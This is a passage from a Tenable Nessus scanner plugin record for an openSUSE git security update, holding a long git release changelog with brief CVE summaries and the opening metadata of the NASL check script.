would fail to detect that as a rename/merge of the subdirectory to the root directory, which has been corrected.\n\n - HTTP transport had possible allocator/deallocator mismatch, which has been corrected.\n\ngit 2.24.1 :\n\n - CVE-2019-1348: The --export-marks option of fast-import is exposed also via the in-stream command feature export-marks=... and it allows overwriting arbitrary paths (bsc#1158785)\n\n - CVE-2019-1349: on Windows, when submodules are cloned recursively, under certain circumstances Git could be fooled into using the same Git directory twice (bsc#1158787)\n\n - CVE-2019-1350: Incorrect quoting of command-line arguments allowed remote code execution during a recursive clone in conjunction with SSH URLs (bsc#1158788)\n\n - CVE-2019-1351: on Windows mistakes drive letters outside of the US-English alphabet as relative paths (bsc#1158789)\n\n - CVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams (bsc#1158790)\n\n - CVE-2019-1353: when run in the Windows Subsystem for Linux while accessing a working directory on a regular Windows drive, none of the NTFS protections were active (bsc#1158791)\n\n - CVE-2019-1354: on Windows refuses to write tracked files with filenames that contain backslashes (bsc#1158792)\n\n - CVE-2019-1387: Recursive clones vulnerability that is caused by too-lax validation of submodule names, allowing very targeted attacks via remote code execution in recursive clones (bsc#1158793)\n\n - CVE-2019-19604: a recursive clone followed by a submodule update could execute code contained within the repository without the user explicitly having asked for that (bsc#1158795)\n\ngit 2.24.0\n\n - The command line parser learned '--end-of-options' notation.\n\n - A mechanism to affect the default setting for a (related) group of configuration variables is introduced.\n\n - 'git fetch' learned '--set-upstream' option to help those who first clone from their private fork they intend to push to, add the true upstream via 'git remote add' and then 'git fetch' from it.\n\n - fixes and improvements to UI, workflow and features, bash completion fixes\n\ngit 2.23.0 :\n\n - The '--base' option of 'format-patch' computed the patch-ids for prerequisite patches in an unstable way, which has been updated to compute in a way that is compatible with 'git patch-id\n\n --stable'.\n\n - The 'git log' command by default behaves as if the\n --mailmap option was given.\n\n - fixes and improvements to UI, workflow and features\n\ngit 2.22.1\n\n - A relative pathname given to 'git init --template=<path> <repo>' ought to be relative to the directory 'git init' gets invoked in, but it instead was made relative to the repository, which has been corrected.\n\n - 'git worktree add' used to fail when another worktree connected to the same repository was corrupt, which has been corrected.\n\n - 'git am -i --resolved' segfaulted after trying to see a commit as if it were a tree, which has been corrected.\n\n - 'git merge --squash' is designed to update the working tree and the index without creating the commit, and this cannot be countermanded by adding the '--commit' option;\n the command now refuses to work when both options are given.\n\n - Update to Unicode 12.1 width table.\n\n - 'git request-pull' learned to warn when the ref we ask them to pull from in the local repository and in the published repository are different.\n\n - 'git fetch' into a lazy clone forgot to fetch base objects that are necessary to complete delta in a thin packfile, which has been corrected.\n\n - The URL decoding code has been updated to avoid going past the end of the string while parsing %-<hex>-<hex> sequence.\n\n - 'git clean' silently skipped a path when it cannot lstat() it; now it gives a warning.\n\n - 'git rm' to resolve a conflicted path leaked an internal message 'needs merge' before actually removing the path, which was confusing. This has been corrected.\n\n - Many more bugfixes and code cleanups.\n\n - removal of SuSEfirewall2 service, since SuSEfirewall2 has been replaced by firewalld.\n\n - partial fix for git instaweb giving 500 error (bsc#1112230)\n\ngit 2.22.0 \n\n - The filter specification '--filter=sparse:path=<path>' used to create a lazy/partial clone has been removed.\n Using a blob that is part of the project as sparse specification is still supported with the '--filter=sparse:oid=<blob>' option\n\n - 'git checkout --no-overlay' can be used to trigger a new mode of checking out paths out of the tree-ish, that allows paths that match the pathspec that are in the current index and working tree and are not in the tree-ish.\n\n - Four new configuration variables (author,committer).(name,email) have been introduced to override user.(name,email) in more specific cases.\n\n - 'git branch' learned a new subcommand '--show-current'.\n\n - The command line completion (in contrib/) has been taught to complete more subcommand parameters.\n\n - The completion helper code now pays attention to repository-local configuration (when available), which allows --list-cmds to honour a repository specific setting of completion.commands, for example.\n\n - The list of conflicted paths shown in the editor while concluding a conflicted merge was shown above the scissors line when the clean-up mode is set to 'scissors', even though it was commented out just like the list of updated paths and other information to help the user explain the merge better.\n\n - 'git rebase' that was reimplemented in C did not set ORIG_HEAD correctly, which has been corrected.\n\n - 'git worktree add' used to do a 'find an available name with stat and then mkdir', which is race-prone. This has been fixed by using mkdir and reacting to EEXIST in a loop. \n\n - Move to DocBook 5.x. Asciidoctor 2.x no longer supports the legacy DocBook 4.5 format.\n\n - update git-web AppArmor profile for bash and tar usrMerge (bsc#1132350)\n\ngit 2.21.0\n\n - Historically, the '-m' (mainline) option can only be used for 'git cherry-pick' and 'git revert' when working with a merge commit. This version of Git no longer warns or errors out when working with a single-parent commit, as long as the argument to the '-m' option is 1 (i.e. it has only one parent, and the request is to pick or revert relative to that first parent). Scripts that relied on the behaviour may get broken with this change.\n\n - Small fixes and features for fast-export and fast-import.\n\n - The 'http.version' configuration variable can be used with recent enough versions of cURL library to force the version of HTTP used to talk when fetching and pushing.\n\n - 'git push $there $src:$dst' rejects when $dst is not a fully qualified refname and it is not clear what the end user meant.\n\n - Update 'git multimail' from the upstream.\n\n - A new date format '--date=human' that morphs its output depending on how far the time is from the current time has been introduced. '--date=auto:human' can be used to use this new format (or any existing format) when the output is going to the pager or to the terminal, and otherwise the default format.\n\n - Fix worktree creation race (bsc#1114225).\n\n - add shadow build dependency to the -daemon subpackage.\n\ngit 2.20.1 :\n\n - portability fixes\n\n - 'git help -a' did not work well when an overly long alias was defined\n\n - no longer squelched an error message when the run_command API failed to run a missing command\n\ngit 2.20.0\n\n - 'git help -a' now gives verbose output (same as 'git help -av'). Those who want the old output may say 'git help --no-verbose -a'..\n\n - 'git send-email' learned to grab address-looking string on any trailer whose name ends with '-by'.\n\n - 'git format-patch' learned new '--interdiff' and '--range-diff' options to explain the difference between this version and the previous attempt in the cover letter (or after the three-dashes as a comment).\n\n - Developer builds now use -Wunused-function compilation option.\n\n - Fix a bug in which the same path could be registered under multiple worktree entries if the path was missing (for instance, was removed manually). Also, as a convenience, expand the number of cases in which --force is applicable.\n\n - The overly large Documentation/config.txt file have been split into million little pieces. This potentially allows each individual piece to be included into the manual page of the command it affects more easily.\n\n - Malformed or crafted data in packstream can make our code attempt to read or write past the allocated buffer and abort, instead of reporting an error, which has been fixed.\n\n - Fix for a long-standing bug that leaves the index file corrupt when it shrinks during a partial commit.\n\n - 'git merge' and 'git pull' that merges into an unborn branch used to completely ignore '--verify-signatures', which has been corrected.\n\n - ...and much more features and fixes\n\ngit 2.19.2 :\n\n - various bug fixes for multiple subcommands and operations\n\ngit 2.19.1 :\n\n - CVE-2018-17456: Specially crafted .gitmodules files may have allowed arbitrary code execution when the repository is cloned with --recurse-submodules (bsc#1110949)\n\ngit 2.19.0 :\n\n - 'git diff' compares the index and the working tree. For paths added with intent-to-add bit, the command shows the full contents of them as added, but the paths themselves were not marked as new files. They are now shown as new by default.\n\n - 'git apply' learned the '--intent-to-add' option so that an otherwise working-tree-only application of a patch will add new paths to the index marked with the 'intent-to-add' bit.\n\n - 'git grep' learned the '--column' option that gives not just the line number but the column number of the hit.\n\n - The '-l' option in 'git branch -l' is an unfortunate short-hand for '--create-reflog', but many users, both old and new, somehow expect it to be something else, perhaps '--list'. This step warns when '-l' is used as a short-hand for '--create-reflog' and warns about the future repurposing of the it when it is used.\n\n - The userdiff pattern for .php has been updated.\n\n - The content-transfer-encoding of the message 'git send-email' sends out by default was 8bit, which can cause trouble when there is an overlong line to bust RFC 5322/2822 limit. A new option 'auto' to automatically switch to quoted-printable when there is such a line in the payload has been introduced and is made the default.\n\n - 'git checkout' and 'git worktree add' learned to honor checkout.defaultRemote when auto-vivifying a local branch out of a remote tracking branch in a repository with multiple remotes that have tracking branches that share the same names. (merge 8d7b558bae ab/checkout-default-remote later to maint).\n\n - 'git grep' learned the '--only-matching' option.\n\n - 'git rebase --rebase-merges' mode now handles octopus merges as well.\n\n - Add a server-side knob to skip commits in exponential/fibbonacci stride in an attempt to cover wider swath of history with a smaller number of iterations, potentially accepting a larger packfile transfer, instead of going back one commit a time during common ancestor discovery during the 'git fetch' transaction. (merge 42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\n - A new configuration variable core.usereplacerefs has been added, primarily to help server installations that want to ignore the replace mechanism altogether.\n\n - Teach 'git tag -s' etc. a few configuration variables (gpg.format that can be set to 'openpgp' or 'x509', and gpg.<format>.program that is used to specify what program to use to deal with the format) to allow x.509 certs with CMS via 'gpgsm' to be used instead of openpgp via 'gnupg'.\n\n - Many more strings are prepared for l10n.\n\n - 'git p4 submit' learns to ask its own pre-submit hook if it should continue with submitting.\n\n - The test performed at the receiving end of 'git push' to prevent bad objects from entering repository can be customized via receive.fsck.* configuration variables;\n we now have gained a counterpart to do the same on the 'git fetch' side, with fetch.fsck.* configuration variables.\n\n - 'git pull --rebase=interactive' learned 'i' as a short-hand for 'interactive'.\n\n - 'git instaweb' has been adjusted to run better with newer Apache on RedHat based distros.\n\n - 'git range-diff' is a reimplementation of 'git tbdiff' that lets us compare individual patches in two iterations of a topic.\n\n - The sideband code learned to optionally paint selected keywords at the beginning of incoming lines on the receiving end.\n\n - 'git branch --list' learned to take the default sort order from the 'branch.sort' configuration variable, just like 'git tag --list' pays attention to 'tag.sort'.\n\n - 'git worktree' command learned '--quiet' option to make it less verbose.\n\ngit 2.18.0 :\n\n - improvements to rename detection logic\n\n - When built with more recent cURL, GIT_SSL_VERSION can now specify 'tlsv1.3' as its value.\n\n - 'git mergetools' learned talking to guiffy.\n\n - various other workflow improvements and fixes\n\n - performance improvements and other developer visible fixes\n\ngit 2.17.1\n\n - Submodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name. We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235, bsc#1095219)\n\n - It was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\n - Support on the server side to reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers by preventing malicious contents from spreading.\n\ngit 2.17.0 :\n\n - 'diff' family of commands learned '--find-object=<object-id>' option to limit the findings to changes that involve the named object.\n\n - 'git format-patch' learned to give 72-cols to diffstat, which is consistent with other line length limits the subcommand uses for its output meant for e-mails.\n\n - The log from 'git daemon' can be redirected with a new option; one relevant use case is to send the log to standard error (instead of syslog) when running it from inetd.\n\n - 'git rebase' learned to take '--allow-empty-message' option.\n\n - 'git am' has learned the '--quit' option, in addition to the existing '--abort' option; having the pair mirrors a few other commands like 'rebase' and 'cherry-pick'.\n\n - 'git worktree add' learned to run the post-checkout hook, just like 'git clone' runs it upon the initial checkout.\n\n - 'git tag' learned an explicit '--edit' option that allows the message given via '-m' and '-F' to be further edited.\n\n - 'git fetch --prune-tags' may be used as a handy short-hand for getting rid of stale tags that are locally held.\n\n - The new '--show-current-patch' option gives an end-user facing way to get the diff being applied when 'git rebase' (and 'git am') stops with a conflict.\n\n - 'git add -p' used to offer '/' (look for a matching hunk) as a choice, even there was only one hunk, which has been corrected. Also the single-key help is now given only for keys that are enabled (e.g. help for '/' won't be shown when there is only one hunk).\n\n - Since Git 1.7.9, 'git merge' defaulted to --no-ff (i.e.\n even when the side branch being merged is a descendant of the current commit, create a merge commit instead of fast-forwarding) when merging a tag object. This was appropriate default for integrators who pull signed tags from their downstream contributors, but caused an unnecessary merges when used by downstream contributors who habitually 'catch up' their topic branches with tagged releases from the upstream. Update 'git merge' to default to --no-ff only when merging a tag object that does *not* sit at its usual place in refs/tags/ hierarchy, and allow fast-forwarding otherwise, to mitigate the problem.\n\n - 'git status' can spend a lot of cycles to compute the relation between the current branch and its upstream, which can now be disabled with '--no-ahead-behind' option.\n\n - 'git diff' and friends learned funcname patterns for Go language source files.\n\n - 'git send-email' learned '--reply-to=<address>' option.\n\n - Funcname pattern used for C# now recognizes 'async' keyword.\n\n - In a way similar to how 'git tag' learned to honor the pager setting only in the list mode, 'git config' learned to ignore the pager setting when it is used for setting values (i.e. when the purpose of the operation is not to 'show').\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : git (openSUSE-2020-598)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2019-1348", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1351", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-19604", "CVE-2020-11008", "CVE-2020-5260"], "modified": "2022-05-16T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:git", "p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:git-core", "p-cpe:/a:novell:opensuse:git-core-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-libsecret", "p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-daemon-debuginfo", "p-cpe:/a:novell:opensuse:git-debuginfo", "p-cpe:/a:novell:opensuse:git-debugsource", "p-cpe:/a:novell:opensuse:git-email", "p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-p4", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git-svn-debuginfo", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:gitk", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-598.NASL", "href": "https://www.tenable.com/plugins/nessus/136311", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-598.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136311);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/16\");\n\n script_cve_id(\"CVE-2017-15298\", \"CVE-2018-11233\", \"CVE-2018-11235\", \"CVE-2018-17456\", \"CVE-2019-1348\", \"CVE-2019-1349\", \"CVE-2019-1350\", \"CVE-2019-1351\", \"CVE-2019-1352\", \"CVE-2019-1353\", \"CVE-2019-1354\", \"CVE-2019-1387\", \"CVE-2019-19604\", \"CVE-2020-11008\", \"CVE-2020-5260\");\n\n script_name(english:\"openSUSE Security Update : git (openSUSE-2020-598)\");\n script_summary(english:\"Check for the openSUSE-2020-598 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for git fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2020-11008: Specially crafted URLs may have tricked\n the credentials helper to providing credential\n information that is not appropriate for the protocol in\n use and host being contacted (bsc#1169936)\n\ngit was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\n - Fix git-daemon not starting after conversion from\n sysvinit to systemd service (bsc#1169605).\n\n - CVE-2020-5260: Specially crafted URLs with newline\n characters could have been used to make the Git client\n to send credential information for a wrong host to the\n attacker's site bsc#1168930\n\ngit 2.26.0 (bsc#1167890, jsc#SLE-11608) :\n\n - 'git rebase' now uses a different backend that is based\n on the 'merge' machinery by default. The\n 'rebase.backend' configuration variable reverts to old\n behaviour when set to 'apply'\n\n - Improved handling of sparse checkouts\n\n - Improvements to many commands and internal features\n\ngit 2.25.2 :\n\n - bug fixes to various subcommands in specific operations\n\ngit 2.25.1 :\n\n - 'git commit' now honors advise.statusHints\n\n - various updates, bug fixes and documentation updates\n\ngit 2.25.0\n\n - The branch description ('git branch --edit-description')\n has been used to fill the body of the cover letters by\n the format-patch command; this has been enhanced so that\n the subject can also be filled.\n\n - A few commands learned to take the pathspec from the\n standard input or a named file, instead of taking it as\n the command line arguments, with the\n '--pathspec-from-file' option.\n\n - Test updates to prepare for SHA-2 transition continues.\n\n - Redo 'git name-rev' to avoid recursive calls.\n\n - When all files from some subdirectory were renamed to\n the root directory, the directory rename heuristics\n would fail to detect that as a rename/merge of the\n subdirectory to the root directory, which has been\n corrected.\n\n - HTTP transport had possible allocator/deallocator\n mismatch, which has been corrected.\n\ngit 2.24.1 :\n\n - CVE-2019-1348: The --export-marks option of fast-import\n is exposed also via the in-stream command feature\n export-marks=... and it allows overwriting arbitrary\n paths (bsc#1158785)\n\n - CVE-2019-1349: on Windows, when submodules are cloned\n recursively, under certain circumstances Git could be\n fooled into using the same Git directory twice\n (bsc#1158787)\n\n - CVE-2019-1350: Incorrect quoting of command-line\n arguments allowed remote code execution during a\n recursive clone in conjunction with SSH URLs\n (bsc#1158788)\n\n - CVE-2019-1351: on Windows mistakes drive letters outside\n of the US-English alphabet as relative paths\n (bsc#1158789)\n\n - CVE-2019-1352: on Windows was unaware of NTFS Alternate\n Data Streams (bsc#1158790)\n\n - CVE-2019-1353: when run in the Windows Subsystem for\n Linux while accessing a working directory on a regular\n Windows drive, none of the NTFS protections were active\n (bsc#1158791)\n\n - CVE-2019-1354: on Windows refuses to write tracked files\n with filenames that contain backslashes (bsc#1158792)\n\n - CVE-2019-1387: Recursive clones vulnerability that is\n caused by too-lax validation of submodule names,\n allowing very targeted attacks via remote code execution\n in recursive clones (bsc#1158793)\n\n - CVE-2019-19604: a recursive clone followed by a\n submodule update could execute code contained within the\n repository without the user explicitly having asked for\n that (bsc#1158795)\n\ngit 2.24.0\n\n - The command line parser learned '--end-of-options'\n notation.\n\n - A mechanism to affect the default setting for a\n (related) group of configuration variables is\n introduced.\n\n - 'git fetch' learned '--set-upstream' option to help\n those who first clone from their private fork they\n intend to push to, add the true upstream via 'git remote\n add' and then 'git fetch' from it.\n\n - fixes and improvements to UI, workflow and features,\n bash completion fixes\n\ngit 2.23.0 :\n\n - The '--base' option of 'format-patch' computed the\n patch-ids for prerequisite patches in an unstable way,\n which has been updated to compute in a way that is\n compatible with 'git patch-id\n\n --stable'.\n\n - The 'git log' command by default behaves as if the\n --mailmap option was given.\n\n - fixes and improvements to UI, workflow and features\n\ngit 2.22.1\n\n - A relative pathname given to 'git init --template=<path>\n <repo>' ought to be relative to the directory 'git init'\n gets invoked in, but it instead was made relative to the\n repository, which has been corrected.\n\n - 'git worktree add' used to fail when another worktree\n connected to the same repository was corrupt, which has\n been corrected.\n\n - 'git am -i --resolved' segfaulted after trying to see a\n commit as if it were a tree, which has been corrected.\n\n - 'git merge --squash' is designed to update the working\n tree and the index without creating the commit, and this\n cannot be countermanded by adding the '--commit' option;\n the command now refuses to work when both options are\n given.\n\n - Update to Unicode 12.1 width table.\n\n - 'git request-pull' learned to warn when the ref we ask\n them to pull from in the local repository and in the\n published repository are different.\n\n - 'git fetch' into a lazy clone forgot to fetch base\n objects that are necessary to complete delta in a thin\n packfile, which has been corrected.\n\n - The URL decoding code has been updated to avoid going\n past the end of the string while parsing %-<hex>-<hex>\n sequence.\n\n - 'git clean' silently skipped a path when it cannot\n lstat() it; now it gives a warning.\n\n - 'git rm' to resolve a conflicted path leaked an internal\n message 'needs merge' before actually removing the path,\n which was confusing. This has been corrected.\n\n - Many more bugfixes and code cleanups.\n\n - removal of SuSEfirewall2 service, since SuSEfirewall2\n has been replaced by firewalld.\n\n - partial fix for git instaweb giving 500 error\n (bsc#1112230)\n\ngit 2.22.0 \n\n - The filter specification '--filter=sparse:path=<path>'\n used to create a lazy/partial clone has been removed.\n Using a blob that is part of the project as sparse\n specification is still supported with the\n '--filter=sparse:oid=<blob>' option\n\n - 'git checkout --no-overlay' can be used to trigger a new\n mode of checking out paths out of the tree-ish, that\n allows paths that match the pathspec that are in the\n current index and working tree and are not in the\n tree-ish.\n\n - Four new configuration variables\n (author,committer).(name,email) have been introduced to\n override user.(name,email) in more specific cases.\n\n - 'git branch' learned a new subcommand '--show-current'.\n\n - The command line completion (in contrib/) has been\n taught to complete more subcommand parameters.\n\n - The completion helper code now pays attention to\n repository-local configuration (when available), which\n allows --list-cmds to honour a repository specific\n setting of completion.commands, for example.\n\n - The list of conflicted paths shown in the editor while\n concluding a conflicted merge was shown above the\n scissors line when the clean-up mode is set to\n 'scissors', even though it was commented out just like\n the list of updated paths and other information to help\n the user explain the merge better.\n\n - 'git rebase' that was reimplemented in C did not set\n ORIG_HEAD correctly, which has been corrected.\n\n - 'git worktree add' used to do a 'find an available name\n with stat and then mkdir', which is race-prone. This has\n been fixed by using mkdir and reacting to EEXIST in a\n loop. \n\n - Move to DocBook 5.x. Asciidoctor 2.x no longer supports\n the legacy DocBook 4.5 format.\n\n - update git-web AppArmor profile for bash and tar\n usrMerge (bsc#1132350)\n\ngit 2.21.0\n\n - Historically, the '-m' (mainline) option can only be\n used for 'git cherry-pick' and 'git revert' when working\n with a merge commit. This version of Git no longer warns\n or errors out when working with a single-parent commit,\n as long as the argument to the '-m' option is 1 (i.e. it\n has only one parent, and the request is to pick or\n revert relative to that first parent). Scripts that\n relied on the behaviour may get broken with this change.\n\n - Small fixes and features for fast-export and\n fast-import.\n\n - The 'http.version' configuration variable can be used\n with recent enough versions of cURL library to force the\n version of HTTP used to talk when fetching and pushing.\n\n - 'git push $there $src:$dst' rejects when $dst is not a\n fully qualified refname and it is not clear what the end\n user meant.\n\n - Update 'git multimail' from the upstream.\n\n - A new date format '--date=human' that morphs its output\n depending on how far the time is from the current time\n has been introduced. '--date=auto:human' can be used to\n use this new format (or any existing format) when the\n output is going to the pager or to the terminal, and\n otherwise the default format.\n\n - Fix worktree creation race (bsc#1114225).\n\n - add shadow build dependency to the -daemon subpackage.\n\ngit 2.20.1 :\n\n - portability fixes\n\n - 'git help -a' did not work well when an overly long\n alias was defined\n\n - no longer squelched an error message when the\n run_command API failed to run a missing command\n\ngit 2.20.0\n\n - 'git help -a' now gives verbose output (same as 'git\n help -av'). Those who want the old output may say 'git\n help --no-verbose -a'..\n\n - 'git send-email' learned to grab address-looking string\n on any trailer whose name ends with '-by'.\n\n - 'git format-patch' learned new '--interdiff' and\n '--range-diff' options to explain the difference between\n this version and the previous attempt in the cover\n letter (or after the three-dashes as a comment).\n\n - Developer builds now use -Wunused-function compilation\n option.\n\n - Fix a bug in which the same path could be registered\n under multiple worktree entries if the path was missing\n (for instance, was removed manually). Also, as a\n convenience, expand the number of cases in which --force\n is applicable.\n\n - The overly large Documentation/config.txt file have been\n split into million little pieces. This potentially\n allows each individual piece to be included into the\n manual page of the command it affects more easily.\n\n - Malformed or crafted data in packstream can make our\n code attempt to read or write past the allocated buffer\n and abort, instead of reporting an error, which has been\n fixed.\n\n - Fix for a long-standing bug that leaves the index file\n corrupt when it shrinks during a partial commit.\n\n - 'git merge' and 'git pull' that merges into an unborn\n branch used to completely ignore '--verify-signatures',\n which has been corrected.\n\n - ...and much more features and fixes\n\ngit 2.19.2 :\n\n - various bug fixes for multiple subcommands and\n operations\n\ngit 2.19.1 :\n\n - CVE-2018-17456: Specially crafted .gitmodules files may\n have allowed arbitrary code execution when the\n repository is cloned with --recurse-submodules\n (bsc#1110949)\n\ngit 2.19.0 :\n\n - 'git diff' compares the index and the working tree. For\n paths added with intent-to-add bit, the command shows\n the full contents of them as added, but the paths\n themselves were not marked as new files. They are now\n shown as new by default.\n\n - 'git apply' learned the '--intent-to-add' option so that\n an otherwise working-tree-only application of a patch\n will add new paths to the index marked with the\n 'intent-to-add' bit.\n\n - 'git grep' learned the '--column' option that gives not\n just the line number but the column number of the hit.\n\n - The '-l' option in 'git branch -l' is an unfortunate\n short-hand for '--create-reflog', but many users, both\n old and new, somehow expect it to be something else,\n perhaps '--list'. This step warns when '-l' is used as a\n short-hand for '--create-reflog' and warns about the\n future repurposing of the it when it is used.\n\n - The userdiff pattern for .php has been updated.\n\n - The content-transfer-encoding of the message 'git\n send-email' sends out by default was 8bit, which can\n cause trouble when there is an overlong line to bust RFC\n 5322/2822 limit. A new option 'auto' to automatically\n switch to quoted-printable when there is such a line in\n the payload has been introduced and is made the default.\n\n - 'git checkout' and 'git worktree add' learned to honor\n checkout.defaultRemote when auto-vivifying a local\n branch out of a remote tracking branch in a repository\n with multiple remotes that have tracking branches that\n share the same names. (merge 8d7b558bae\n ab/checkout-default-remote later to maint).\n\n - 'git grep' learned the '--only-matching' option.\n\n - 'git rebase --rebase-merges' mode now handles octopus\n merges as well.\n\n - Add a server-side knob to skip commits in\n exponential/fibbonacci stride in an attempt to cover\n wider swath of history with a smaller number of\n iterations, potentially accepting a larger packfile\n transfer, instead of going back one commit a time during\n common ancestor discovery during the 'git fetch'\n transaction. (merge 42cc7485a2\n jt/fetch-negotiator-skipping later to maint).\n\n - A new configuration variable core.usereplacerefs has\n been added, primarily to help server installations that\n want to ignore the replace mechanism altogether.\n\n - Teach 'git tag -s' etc. a few configuration variables\n (gpg.format that can be set to 'openpgp' or 'x509', and\n gpg.<format>.program that is used to specify what\n program to use to deal with the format) to allow x.509\n certs with CMS via 'gpgsm' to be used instead of openpgp\n via 'gnupg'.\n\n - Many more strings are prepared for l10n.\n\n - 'git p4 submit' learns to ask its own pre-submit hook if\n it should continue with submitting.\n\n - The test performed at the receiving end of 'git push' to\n prevent bad objects from entering repository can be\n customized via receive.fsck.* configuration variables;\n we now have gained a counterpart to do the same on the\n 'git fetch' side, with fetch.fsck.* configuration\n variables.\n\n - 'git pull --rebase=interactive' learned 'i' as a\n short-hand for 'interactive'.\n\n - 'git instaweb' has been adjusted to run better with\n newer Apache on RedHat based distros.\n\n - 'git range-diff' is a reimplementation of 'git tbdiff'\n that lets us compare individual patches in two\n iterations of a topic.\n\n - The sideband code learned to optionally paint selected\n keywords at the beginning of incoming lines on the\n receiving end.\n\n - 'git branch --list' learned to take the default sort\n order from the 'branch.sort' configuration variable,\n just like 'git tag --list' pays attention to 'tag.sort'.\n\n - 'git worktree' command learned '--quiet' option to make\n it less verbose.\n\ngit 2.18.0 :\n\n - improvements to rename detection logic\n\n - When built with more recent cURL, GIT_SSL_VERSION can\n now specify 'tlsv1.3' as its value.\n\n - 'git mergetools' learned talking to guiffy.\n\n - various other workflow improvements and fixes\n\n - performance improvements and other developer visible\n fixes\n\ngit 2.17.1\n\n - Submodule 'names' come from the untrusted .gitmodules\n file, but we blindly append them to $GIT_DIR/modules to\n create our on-disk repo paths. This means you can do bad\n things by putting '../' into the name. We now enforce\n some rules for submodule names which will cause Git to\n ignore these malicious names (CVE-2018-11235,\n bsc#1095219)\n\n - It was possible to trick the code that sanity-checks\n paths on NTFS into reading random piece of memory\n (CVE-2018-11233, bsc#1095218)\n\n - Support on the server side to reject pushes to\n repositories that attempt to create such problematic\n .gitmodules file etc. as tracked contents, to help\n hosting sites protect their customers by preventing\n malicious contents from spreading.\n\ngit 2.17.0 :\n\n - 'diff' family of commands learned\n '--find-object=<object-id>' option to limit the findings\n to changes that involve the named object.\n\n - 'git format-patch' learned to give 72-cols to diffstat,\n which is consistent with other line length limits the\n subcommand uses for its output meant for e-mails.\n\n - The log from 'git daemon' can be redirected with a new\n option; one relevant use case is to send the log to\n standard error (instead of syslog) when running it from\n inetd.\n\n - 'git rebase' learned to take '--allow-empty-message'\n option.\n\n - 'git am' has learned the '--quit' option, in addition to\n the existing '--abort' option; having the pair mirrors a\n few other commands like 'rebase' and 'cherry-pick'.\n\n - 'git worktree add' learned to run the post-checkout\n hook, just like 'git clone' runs it upon the initial\n checkout.\n\n - 'git tag' learned an explicit '--edit' option that\n allows the message given via '-m' and '-F' to be further\n edited.\n\n - 'git fetch --prune-tags' may be used as a handy\n short-hand for getting rid of stale tags that are\n locally held.\n\n - The new '--show-current-patch' option gives an end-user\n facing way to get the diff being applied when 'git\n rebase' (and 'git am') stops with a conflict.\n\n - 'git add -p' used to offer '/' (look for a matching\n hunk) as a choice, even there was only one hunk, which\n has been corrected. Also the single-key help is now\n given only for keys that are enabled (e.g. help for '/'\n won't be shown when there is only one hunk).\n\n - Since Git 1.7.9, 'git merge' defaulted to --no-ff (i.e.\n even when the side branch being merged is a descendant\n of the current commit, create a merge commit instead of\n fast-forwarding) when merging a tag object. This was\n appropriate default for integrators who pull signed tags\n from their downstream contributors, but caused an\n unnecessary merges when used by downstream contributors\n who habitually 'catch up' their topic branches with\n tagged releases from the upstream. Update 'git merge' to\n default to --no-ff only when merging a tag object that\n does *not* sit at its usual place in refs/tags/\n hierarchy, and allow fast-forwarding otherwise, to\n mitigate the problem.\n\n - 'git status' can spend a lot of cycles to compute the\n relation between the current branch and its upstream,\n which can now be disabled with '--no-ahead-behind'\n option.\n\n - 'git diff' and friends learned funcname patterns for Go\n language source files.\n\n - 'git send-email' learned '--reply-to=<address>' option.\n\n - Funcname pattern used for C# now recognizes 'async'\n keyword.\n\n - In a way similar to how 'git tag' learned to honor the\n pager setting only in the list mode, 'git config'\n learned to ignore the pager setting when it is used for\n setting values (i.e. when the purpose of the operation\n is not to 'show').\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1110949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112230\"\n );\n script_set_attribute(\n 